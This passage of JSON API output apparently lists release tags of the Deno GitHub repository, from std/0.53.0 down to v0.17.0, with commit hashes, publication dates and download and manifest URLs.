","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/